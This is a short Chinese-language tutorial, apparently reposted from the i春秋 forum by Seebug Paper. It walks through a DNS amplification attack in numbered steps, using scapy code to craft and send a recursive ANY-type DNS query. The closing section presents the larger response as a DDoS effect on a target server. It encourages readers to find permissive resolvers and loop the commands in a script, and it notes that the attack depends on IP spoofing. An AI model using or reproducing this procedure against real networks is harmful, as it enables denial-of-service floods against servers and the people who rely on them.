本文來自i春秋作者: 即刻安全

前言:

今天為大家介紹DNS放大攻擊。通過DNS服務器的遞歸查詢,我們可以利用少量的查詢流量,來獲得大量的返回數據流量。該攻擊方式需要結合IP地址偽造,同時需要DNS服務器支持遞歸查詢。下面我們來看看,如何實現攻擊?

0x00

首先,我們用 scapy 來構造一個完整的DNS查詢數據包。

i=IP()
i.display()

0x01

修改目標DNS地址。

i.dst="8.8.8.8"

i.display()

0x02

定義UDP包。

u=UDP()
u.display()

0x03

定義DNS包。

d=DNS()
d.rd=1
d.qdcount=1
d.display()

0x04

設置DNS查詢內容。

q=DNSQR()
q.qname="xxxxx.com"
q.qtype=255
q.display()

0x05

d.qd=q (把查詢內容賦給DNS的qd)
r=(i/u/d)
d.display()

0x06

最后我們來發送我們構建的數據包。

sr1(r)

0x07

我們打開 wireshark 來進行抓包。

后序:

通過 wireshark 的抓包我們可以看到,我們查詢時發送的數據包為 68 字節,但響應包為118字節。這樣就實現了,通過返回的大流量來達到對目標服務器的DDoS效果!當然這里返回的流量還不夠巨大,原因在于DNS服務器做了一定的限制。只要找到合適的DNS服務器,并將以上命令寫入腳本中循環執行,那么效果將更加明顯!下面是我們即刻安全的微信公眾號,歡迎大家關注!!

原文地址:http://bbs.ichunqiu.com/thread-12685-1-1.html?from=paper


Paper 本文由 Seebug Paper 發布,如需轉載請注明來源。本文地址:http://www.bjnorthway.com/60/